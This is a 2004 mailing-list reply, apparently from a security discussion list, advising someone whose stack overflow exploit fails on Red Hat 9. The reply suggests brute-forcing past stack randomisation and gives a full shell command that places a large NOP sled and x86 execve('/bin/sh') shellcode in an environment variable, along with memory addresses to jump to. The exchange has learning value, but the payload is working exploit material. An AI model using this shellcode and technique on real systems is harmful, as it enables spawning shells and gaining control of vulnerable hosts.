Op Tuesday 09 November 2004 04:09, eip_at_tampabay.rr.com sgreifde:
<snip>
> I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
> 9 box kernel 2.4.20-31.9. Am I doing something wrong?
no, you don't
but... RH does randomize the stack a little iirc
so, my way of doing stuff then, is just brute force it! :)
(you could also return tu libc or whatever)
best way to do it (i think) is : put your shellcode in the env...
export SHELLCODE=`perl -e '{print "\x90"x65000 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`
that should give you some breathing space for where to jump to...
shellcode starts (on my box at 0xbfff0027, so everything from there to
0xbffffe00 sould do fine...
--
harry
aka Rik Bobbaers
K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaers@cc.kuleuven.ac.be -=- http://harry.ulyssis.org
"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"
Received on Nov 10 2004
Intro
